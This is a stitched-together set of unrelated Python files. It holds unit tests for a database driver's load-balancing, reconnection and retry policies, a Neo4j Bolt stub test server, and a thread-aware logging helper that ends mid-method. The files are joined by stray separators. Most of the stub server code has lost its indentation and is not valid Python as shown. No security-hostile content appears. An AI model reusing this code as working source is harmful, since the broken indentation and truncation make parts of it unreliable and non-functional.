        hosts = []
        for i in range(4):
            h = Host(i, SimpleConvictionPolicy)
            h.set_location_info("dc1", "rack1")
            hosts.append(h)
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
        policy.populate(Mock(spec=Metadata), hosts)
        for host in hosts:
            policy.on_down(host)
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])
    def test_no_nodes(self):
        """
        Ensure query plan for an empty cluster will execute without errors
        """
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
        policy.populate(None, [])
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])
class TokenAwarePolicyTest(unittest.TestCase):
    """Tests for TokenAwarePolicy: replica hosts for a statement's routing
    key are tried first, then the wrapped child policy orders the rest."""
    def test_wrap_round_robin(self):
        """Replicas from metadata lead the plan; remaining hosts follow."""
        cluster = Mock(spec=Cluster)
        cluster.metadata = Mock(spec=Metadata)
        hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
        for host in hosts:
            host.set_up()
        def get_replicas(keyspace, packed_key):
            # Deterministic fake replica map: two consecutive hosts,
            # starting at the integer packed into the routing key.
            index = struct.unpack('>i', packed_key)[0]
            return list(islice(cycle(hosts), index, index + 2))
        cluster.metadata.get_replicas.side_effect = get_replicas
        policy = TokenAwarePolicy(RoundRobinPolicy())
        policy.populate(cluster, hosts)
        for i in range(4):
            query = Statement(routing_key=struct.pack('>i', i))
            qplan = list(policy.make_query_plan(None, query))
            replicas = get_replicas(None, struct.pack('>i', i))
            other = set(h for h in hosts if h not in replicas)
            self.assertEqual(replicas, qplan[:2])
            self.assertEqual(other, set(qplan[2:]))
        # Should use the secondary policy
        for i in range(4):
            qplan = list(policy.make_query_plan())
            self.assertEqual(set(qplan), set(hosts))
    def test_wrap_dc_aware(self):
        """With a DC-aware child, plans go local replica, local non-replica,
        then (at most) one remote host."""
        cluster = Mock(spec=Cluster)
        cluster.metadata = Mock(spec=Metadata)
        hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
        for host in hosts:
            host.set_up()
        for h in hosts[:2]:
            h.set_location_info("dc1", "rack1")
        for h in hosts[2:]:
            h.set_location_info("dc2", "rack1")
        def get_replicas(keyspace, packed_key):
            index = struct.unpack('>i', packed_key)[0]
            # return one node from each DC
            if index % 2 == 0:
                return [hosts[0], hosts[2]]
            else:
                return [hosts[1], hosts[3]]
        cluster.metadata.get_replicas.side_effect = get_replicas
        policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
        policy.populate(cluster, hosts)
        for i in range(4):
            query = Statement(routing_key=struct.pack('>i', i))
            qplan = list(policy.make_query_plan(None, query))
            replicas = get_replicas(None, struct.pack('>i', i))
            # first should be the only local replica
            self.assertIn(qplan[0], replicas)
            self.assertEqual(qplan[0].datacenter, "dc1")
            # then the local non-replica
            self.assertNotIn(qplan[1], replicas)
            self.assertEqual(qplan[1].datacenter, "dc1")
            # then one of the remotes (used_hosts_per_remote_dc is 1, so we
            # shouldn't see two remotes)
            self.assertEqual(qplan[2].datacenter, "dc2")
            self.assertEqual(3, len(qplan))
    class FakeCluster:
        # Minimal stand-in for Cluster: only the metadata attribute is
        # read by TokenAwarePolicy.populate() in these tests.
        def __init__(self):
            self.metadata = Mock(spec=Metadata)
    def test_get_distance(self):
        """
        Same test as DCAwareRoundRobinPolicyTest.test_get_distance()
        Except a FakeCluster is needed for the metadata variable and
        policy.child_policy is needed to change child policy settings
        """
        policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0))
        host = Host("ip1", SimpleConvictionPolicy)
        host.set_location_info("dc1", "rack1")
        policy.populate(self.FakeCluster(), [host])
        self.assertEqual(policy.distance(host), HostDistance.LOCAL)
        # used_hosts_per_remote_dc is set to 0, so ignore it
        remote_host = Host("ip2", SimpleConvictionPolicy)
        remote_host.set_location_info("dc2", "rack1")
        self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
        # dc2 isn't registered in the policy's live_hosts dict
        policy._child_policy.used_hosts_per_remote_dc = 1
        self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
        # make sure the policy has both dcs registered
        policy.populate(self.FakeCluster(), [host, remote_host])
        self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
        # since used_hosts_per_remote_dc is set to 1, only the first
        # remote host in dc2 will be REMOTE, the rest are IGNORED
        second_remote_host = Host("ip3", SimpleConvictionPolicy)
        second_remote_host.set_location_info("dc2", "rack1")
        policy.populate(self.FakeCluster(), [host, remote_host, second_remote_host])
        distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
        self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
    def test_status_updates(self):
        """
        Same test as DCAwareRoundRobinPolicyTest.test_status_updates()
        """
        hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
        for h in hosts[:2]:
            h.set_location_info("dc1", "rack1")
        for h in hosts[2:]:
            h.set_location_info("dc2", "rack1")
        policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
        policy.populate(self.FakeCluster(), hosts)
        policy.on_down(hosts[0])
        policy.on_remove(hosts[2])
        new_local_host = Host(4, SimpleConvictionPolicy)
        new_local_host.set_location_info("dc1", "rack1")
        policy.on_up(new_local_host)
        new_remote_host = Host(5, SimpleConvictionPolicy)
        new_remote_host.set_location_info("dc9000", "rack1")
        policy.on_add(new_remote_host)
        # we now have two local hosts and two remote hosts in separate dcs
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
        self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
        # since we have hosts in dc9000, the distance shouldn't be IGNORED
        self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
        policy.on_down(new_local_host)
        policy.on_down(hosts[1])
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
        policy.on_down(new_remote_host)
        policy.on_down(hosts[3])
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])
class ConvictionPolicyTest(unittest.TestCase):
    """Checks on the abstract ConvictionPolicy base class."""

    def test_not_implemented(self):
        """Both operations on the interface-style base class must raise."""
        policy = ConvictionPolicy(1)
        for operation in (lambda: policy.add_failure(1), policy.reset):
            self.assertRaises(NotImplementedError, operation)
class SimpleConvictionPolicyTest(unittest.TestCase):
    """Checks on the trivial SimpleConvictionPolicy implementation."""

    def test_basic_responses(self):
        """add_failure always convicts (True); reset returns None."""
        policy = SimpleConvictionPolicy(1)
        result = policy.add_failure(1)
        self.assertEqual(True, result)
        self.assertEqual(None, policy.reset())
class ReconnectionPolicyTest(unittest.TestCase):
    """Checks on the abstract ReconnectionPolicy base class."""

    def test_basic_responses(self):
        """new_schedule() must be unimplemented on the base class."""
        base_policy = ReconnectionPolicy()
        self.assertRaises(NotImplementedError, base_policy.new_schedule)
class ConstantReconnectionPolicyTest(unittest.TestCase):
    """Tests for ConstantReconnectionPolicy construction and scheduling."""

    def test_bad_vals(self):
        """A negative delay must be rejected at construction time."""
        self.assertRaises(ValueError, ConstantReconnectionPolicy, -1, 0)

    def test_schedule(self):
        """The schedule has max_attempts entries, each equal to the delay."""
        delay = 2
        max_attempts = 100
        policy = ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
        schedule = list(policy.new_schedule())
        self.assertEqual(len(schedule), max_attempts)
        # The original loop rebound the name ``delay`` as its loop variable,
        # turning the assertion into a tautology (delay == delay) that could
        # never fail. Compare each entry against the configured constant.
        for scheduled_delay in schedule:
            self.assertEqual(scheduled_delay, delay)

    def test_schedule_negative_max_attempts(self):
        """
        Test how negative max_attempts are handled
        """
        delay = 2
        max_attempts = -100
        try:
            ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
            self.fail('max_attempts should throw ValueError when negative')
        except ValueError:
            pass
class ExponentialReconnectionPolicyTest(unittest.TestCase):
    """Tests for ExponentialReconnectionPolicy construction and scheduling."""

    def test_bad_vals(self):
        """Negative delays and max_delay < base_delay are all rejected."""
        for base_delay, max_delay in ((-1, 0), (0, -1), (9000, 1)):
            self.assertRaises(ValueError, ExponentialReconnectionPolicy,
                              base_delay, max_delay)

    def test_schedule(self):
        """Delays double from the base until they are capped at max_delay."""
        policy = ExponentialReconnectionPolicy(base_delay=2, max_delay=100)
        schedule = list(policy.new_schedule())
        self.assertEqual(len(schedule), 64)
        expected = 2
        for delay in schedule:
            self.assertEqual(delay, expected)
            expected = min(expected * 2, 100)
# Shorthand consistency level used throughout the retry-policy tests below.
ONE = ConsistencyLevel.ONE
class RetryPolicyTest(unittest.TestCase):
    """Tests for the default RetryPolicy: retry exactly once, and only in
    the narrow cases where a retry can actually succeed."""
    def test_read_timeout(self):
        """Read timeouts retry only when enough replicas responded but no
        data was returned, and only on the first attempt."""
        policy = RetryPolicy()
        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=1, received_responses=2,
            data_retrieved=True, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # if we didn't get enough responses, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=1,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # if we got enough responses, but also got a data response, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # we got enough responses but no data response, so retry
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=False, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)
    def test_write_timeout(self):
        """Write timeouts retry only BATCH_LOG writes, on the first attempt."""
        policy = RetryPolicy()
        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # if it's not a BATCH_LOG write, don't retry it
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # retry BATCH_LOG writes regardless of received responses
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
            required_responses=10000, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)
    def test_unavailable(self):
        """
        Use the same tests for test_write_timeout, but ensure they only RETHROW
        """
        policy = RetryPolicy()
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=10000, alive_replicas=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
    
class FallthroughRetryPolicyTest(unittest.TestCase):
    """
    Use the same tests for test_write_timeout, but ensure they only RETHROW
    """
    # FallthroughRetryPolicy never retries: every input combination that the
    # default RetryPolicy would retry must still come back RETHROW here.
    def test_read_timeout(self):
        """All read-timeout cases rethrow, including the retryable ones."""
        policy = FallthroughRetryPolicy()
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=1, received_responses=2,
            data_retrieved=True, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=1,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=False, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
    def test_write_timeout(self):
        """All write-timeout cases rethrow, even BATCH_LOG writes."""
        policy = FallthroughRetryPolicy()
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
            required_responses=10000, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
    def test_unavailable(self):
        """All unavailable cases rethrow."""
        policy = FallthroughRetryPolicy()
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=10000, alive_replicas=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
class DowngradingConsistencyRetryPolicyTest(unittest.TestCase):
    """Tests for DowngradingConsistencyRetryPolicy: on the first failed
    attempt it retries at the highest consistency level that the number of
    received responses / alive replicas can still satisfy."""
    def test_read_timeout(self):
        policy = DowngradingConsistencyRetryPolicy()
        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=1, received_responses=2,
            data_retrieved=True, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # if we didn't get enough responses, retry at a lower consistency
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=4, received_responses=3,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.THREE)
        # if we didn't get enough responses, retry at a lower consistency
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.TWO)
        # retry consistency level goes down based on the # of recv'd responses
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=1,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.ONE)
        # if we got no responses, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=0,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # if we got enough response but no data, retry
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=3,
            data_retrieved=False, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)
        # if we got enough responses, but also got a data response, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
    def test_write_timeout(self):
        policy = DowngradingConsistencyRetryPolicy()
        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # ignore failures on these types of writes
        for write_type in (WriteType.SIMPLE, WriteType.BATCH, WriteType.COUNTER):
            retry, consistency = policy.on_write_timeout(
                query=None, consistency=ONE, write_type=write_type,
                required_responses=1, received_responses=2, retry_num=0)
            self.assertEqual(retry, RetryPolicy.IGNORE)
        # downgrade consistency level on unlogged batch writes
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.UNLOGGED_BATCH,
            required_responses=3, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.ONE)
        # retry batch log writes at the same consistency level
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
            required_responses=3, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)
        # timeout on an unknown write_type
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=None,
            required_responses=1, received_responses=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
    def test_unavailable(self):
        policy = DowngradingConsistencyRetryPolicy()
        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
        # downgrade consistency on unavailable exceptions
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.ONE)
|
stub.py | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2002-2019 "Neo Technology,"
# Network Engine for Objects in Lund AB [http://neotechnology.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from asyncio import new_event_loop, start_server, sleep, CancelledError, ensure_future, \
set_event_loop
from logging import getLogger
from threading import Event, Thread
from boltkit.addressing import Address
from boltkit.packstream import PackStream
from boltkit.server.scripting import ServerExit, ScriptMismatch, BoltScript, \
ClientMessageLine
log = getLogger("boltkit")
class BoltStubService:
default_base_port = 17687
default_timeout = 30
thread = None
auth = ("neo4j", "")
@classmethod
def load(cls, *script_filenames, **kwargs):
return cls(*map(BoltScript.load, script_filenames), **kwargs)
def __init__(self, *scripts, listen_addr=None, exit_on_disconnect=True, timeout=None):
if listen_addr:
listen_addr = Address(listen_addr)
else:
listen_addr = Address(("localhost", self.default_base_port))
self.exit_on_disconnect = exit_on_disconnect
self.timeout = timeout or self.default_timeout
self.loop = None
self.sleeper = None
self.host = listen_addr.host
self.next_free_port = listen_addr.port_number
self.scripts = {}
for script in scripts:
if script.port:
address = Address((listen_addr.host, script.port))
else:
address = Address((listen_addr.host, self.next_free_port))
self.next_free_port += 1
self.scripts[address.port_number] = script
self.servers = {}
self.started = Event()
self._exception = None
async def __aenter__(self):
self.start()
await self.wait_started()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.stop()
await self.wait_stopped()
@property
def addresses(self):
return sorted(Address((self.host, port)) for port in self.scripts)
@property
def primary_address(self):
return self.addresses[0]
def start(self):
if self.thread and self.thread.is_alive():
raise RuntimeError("Already running")
self.thread = Thread(target=self._run, daemon=True)
self.thread.start()
def stop(self):
if self.loop and self.sleeper:
self.loop.call_soon_threadsafe(self.sleeper.cancel)
self.sleeper = None
async def wait_started(self):
if self.thread and self.thread.is_alive():
self.started.wait()
async def wait_stopped(self):
if self.thread and self.thread.is_alive():
self.thread.join()
if self._exception:
raise self._exception
async def _start_servers(self):
self.servers.clear()
for port_number, script in self.scripts.items():
address = Address((self.host, port_number))
server = await start_server(self._handshake, host=self.host, port=port_number)
log.debug("[#%04X] S: <LISTEN> %s (%s)", port_number, address, script.filename)
self.servers[port_number] = server
self.started.set()
async def _stop_servers(self):
for server in self.servers.values():
server.close()
await server.wait_closed()
def _run(self):
self.loop = new_event_loop()
self.loop.set_debug(True)
set_event_loop(self.loop)
try:
self.loop.run_until_complete(self._a_run())
except Exception as e:
self._exception = e
raise
finally:
self.loop.stop()
self.loop.close()
self.loop = None
async def _a_run(self):
try:
await self._start_servers()
self.sleeper = ensure_future(sleep(self.timeout))
await self.sleeper
except CancelledError:
pass
else:
raise TimeoutError("Timed out after {!r}s".format(self.timeout))
finally:
await self._stop_servers()
async def _handshake(self, reader, writer):
    """Per-connection handler: perform the Bolt handshake, then play the
    script for this port via a BoltActor.

    Errors other than a scripted ServerExit are recorded for
    wait_stopped() to re-raise; the connection is always hung up.
    """
    client_address = Address(writer.transport.get_extra_info("peername"))
    server_address = Address(writer.transport.get_extra_info("sockname"))
    script = self.scripts[server_address.port_number]
    log.debug("[#%04X] S: <ACCEPT> %s -> %s", server_address.port_number,
              client_address, server_address)
    try:
        # Bolt handshake is a fixed 20-byte client request — presumably the
        # magic preamble plus four proposed protocol versions; confirm
        # against the Bolt protocol specification.
        request = await reader.readexactly(20)
        log.debug("[#%04X] C: <HANDSHAKE> %r", server_address.port_number, request)
        response = script.on_handshake(request)
        log.debug("[#%04X] S: <HANDSHAKE> %r", server_address.port_number, response)
        writer.write(response)
        await writer.drain()
        actor = BoltActor(script, reader, writer)
        await actor.play()
    except ServerExit:
        # Scripted, intentional termination — not an error.
        pass
    except Exception as e:
        self._exception = e
    finally:
        log.debug("[#%04X] S: <HANGUP>", server_address.port_number)
        try:
            writer.write_eof()
        except OSError:
            pass
        await self._on_disconnect(server_address.port_number)
async def _on_disconnect(self, port):
    """After a client hangs up, optionally retire that port's server and,
    once no servers remain, stop the whole service (exit-on-disconnect)."""
    if self.exit_on_disconnect:
        server = self.servers[port]
        server.close()
        await server.wait_closed()
        del self.servers[port]
        if not self.servers:
            self.stop()
class BoltActor:
    """Drives a scripted Bolt conversation over one client connection."""

    def __init__(self, script, reader, writer):
        # script: parsed stub script; reader/writer: asyncio stream pair.
        self.script = script
        self.reader = reader
        self.writer = writer
        self.stream = PackStream(reader, writer)

    @property
    def server_address(self):
        """Local (server-side) address of this connection."""
        return Address(self.writer.transport.get_extra_info("sockname"))

    async def play(self):
        """Execute every script line in order, then the default client
        action; connection errors mean the client went away and are
        deliberately swallowed."""
        try:
            for line in self.script:
                try:
                    await line.action(self)
                except ScriptMismatch as error:
                    # Attach context information and re-raise
                    error.script = self.script
                    error.line_no = line.line_no
                    raise
            await ClientMessageLine.default_action(self)
        except (ConnectionError, OSError):
            # It's likely the client has gone away, so we can
            # safely drop out and silence the error. There's no
            # point in flagging a broken client from a test helper.
            return

    def log(self, text, *args):
        # Prefix every message with the local port so interleaved output
        # from multiple stub servers stays readable.
        log.debug("[#%04X] " + text, self.server_address.port_number, *args)

    def log_error(self, text, *args):
        log.error("[#%04X] " + text, self.server_address.port_number, *args)
|
loggerbythread.py | # -*- coding: utf-8 -*-
import logging
import logging.handlers
import sys
import threading
import os
__author__ = 'Ares Ou (aresowj@gmail.com)'
# public logging levels (re-exported so callers need not import logging)
LOG_LEVEL_NOTSET = logging.NOTSET
LOG_LEVEL_DEBUG = logging.DEBUG
LOG_LEVEL_INFO = logging.INFO
LOG_LEVEL_WARNING = logging.WARNING
LOG_LEVEL_ERROR = logging.ERROR
# logger target bit flags (combinable output destinations)
LOG_TARGET_CONSOLE = 0x1
LOG_TARGET_LOG_FILE = 0x10
LOG_TARGET_LOG_HTTP = 0x100
# _LOGGER_FORMAT = "[%(levelname)7s] [%(asctime)s] [%(thread)d] [%(module)s] - %(message)s"
_LOGGER_FORMAT = "[%(levelname)7s][%(asctime)s]- %(message)s"
class InfoOrLessCritical(logging.Filter):
    """Log filter that passes only records milder than WARNING."""

    def filter(self, record):
        # Reject WARNING and above; DEBUG/INFO go through.
        return not record.levelno >= LOG_LEVEL_WARNING
class HandlerFactory(object):
    """Creates and caches shared logging handlers.

    Each handler is built once and reused, so multiple loggers attach the
    very same handler object instead of duplicates.
    """

    # cache: name -> handler; the rotating-file entry is a nested dict
    # keyed by log path.
    handlers = {}

    @classmethod
    def get_std_out_handler(cls):
        """Stdout handler that shows only records below WARNING."""
        if 'std_out_handler' not in cls.handlers:
            std_out_handler = logging.StreamHandler(sys.stdout)
            std_out_handler.setFormatter(logging.Formatter(_LOGGER_FORMAT))
            # Keep WARNING+ off stdout; those go to the stderr handler.
            std_out_handler.addFilter(InfoOrLessCritical())
            cls.handlers['std_out_handler'] = std_out_handler
        return cls.handlers['std_out_handler']

    @classmethod
    def get_std_err_handler(cls):
        """Stderr handler restricted to WARNING and above."""
        if 'std_err_handler' not in cls.handlers:
            std_err_handler = logging.StreamHandler(sys.stderr)
            std_err_handler.setFormatter(logging.Formatter(_LOGGER_FORMAT))
            std_err_handler.setLevel(LOG_LEVEL_WARNING)
            cls.handlers['std_err_handler'] = std_err_handler
        return cls.handlers['std_err_handler']

    @classmethod
    def get_rotating_file_handler(cls, log_path, max_bytes, backup_count):
        """Rotating file handler for *log_path*, cached per path.

        NOTE(review): ``max_bytes``/``backup_count`` are only honoured the
        first time a path is seen; later calls reuse the cached handler.
        """
        if 'rotating_file_handler' not in cls.handlers:
            cls.handlers['rotating_file_handler'] = {}
        if log_path not in cls.handlers['rotating_file_handler']:
            rotating_file_handler = logging.handlers.RotatingFileHandler(
                log_path, 'a', max_bytes, backup_count)
            rotating_file_handler.setFormatter(logging.Formatter(_LOGGER_FORMAT))
            cls.handlers['rotating_file_handler'][log_path] = rotating_file_handler
        return cls.handlers['rotating_file_handler'][log_path]
# module-level logger used for this module's own status messages
logger = logging.getLogger(__name__)
def singleton(cls, *args, **kw):
    """Class decorator making *cls* return one shared instance.

    The first call constructs the instance; every later call returns the
    cached one.  Bug fix: the original inner wrapper accepted no
    arguments, so a decorated class could never be constructed with
    arguments (``GeneralLogger(level=X)`` raised TypeError).  The wrapper
    now forwards call-time arguments, falling back to any bound at
    decoration time, which keeps plain ``@singleton`` usage unchanged.

    Args:
        cls: the class to wrap.
        *args, **kw: optional decoration-time constructor arguments.

    Returns:
        A callable that returns the single shared instance of ``cls``.
    """
    instances = {}

    def _singleton(*call_args, **call_kw):
        if cls not in instances:
            # Prefer call-time arguments; fall back to decoration-time ones.
            instances[cls] = cls(*(call_args or args), **(call_kw or kw))
        return instances[cls]

    return _singleton
@singleton
class GeneralLogger(object):
    """Application-wide logging facade (singleton).

    Attaches stdout/stderr handlers to the root logger and manages one
    ``logging.Logger`` per thread when per-thread logging is enabled.
    """

    def __init__(self, level=LOG_LEVEL_DEBUG, log_by_thread=False, log_path='', max_bytes=0, backup_count=0):
        # set root logger
        logging.getLogger().setLevel(LOG_LEVEL_NOTSET)
        logging.getLogger().addHandler(HandlerFactory.get_std_out_handler())
        logging.getLogger().addHandler(HandlerFactory.get_std_err_handler())
        # default logger setting
        logger.info("General logger initializing...")
        self._loggers = {}  # logger name -> logging.Logger
        self._log_level = level
        self._main_thread_id = str(self.get_current_thread_id())
        self._log_destination = LOG_TARGET_CONSOLE
        self._log_by_thread = log_by_thread
        self._log_path = log_path
        self._log_file_max_bytes = max_bytes
        self._log_file_backup_count = backup_count

    @staticmethod
    def get_current_thread_id():
        # Numeric identifier of the calling thread.
        return threading.current_thread().ident

    @staticmethod
    def get_current_thread_name():
        return threading.current_thread().name

    def get_log_file_name(self):
        """Resolve the configured log path to a concrete log file name."""
        log_path = os.path.abspath(self._log_path)  # absolute path incl. drive, e.g. d:\tmp\test.txt
        base_name = os.path.basename(log_path)  # file name component, e.g. test.txt
        base_dir = os.path.dirname(log_path)  # directory component, e.g. d:\tmp
        # print("path parts:", log_path, base_name, base_dir)
        if self._log_by_thread:
            # base_name = '%d_%s_%s' % (self.get_current_thread_id(), self.get_current_thread_name(), base_name)  # thread id/name in the file name — disabled
            # base_name =
            pass
        if os.path.isdir(log_path):
            # only folder path provided, create a name for the log file
            return os.path.join(log_path, base_name)
        elif base_name and '.' not in base_name:
            # path is like '/tmp/a' and folder should be created
            # NOTE(review): os.makedirs raises if the directory already exists.
            os.makedirs(log_path)
            return os.path.join(log_path, base_name)
        else:
            return os.path.join(base_dir, base_name)

    def get_logger(self):
        """Return the logger for the calling thread, creating it on demand."""
        name = self._main_thread_id
        if self._log_by_thread:
            current_id = str(self.get_current_thread_id())
            if current_id != self._main_thread_id:
                # set loggers of sub threads as children of main logger
                # so that logs from sub thread will be processed by
                # main logger. Otherwise, main logs will not contain sub logs.
                name = self._main_thread_id + '.' + current_id
        if name not in self._loggers:
            self.set_logger(name)
        return self._loggers[name]

    def set_logger(self, name):
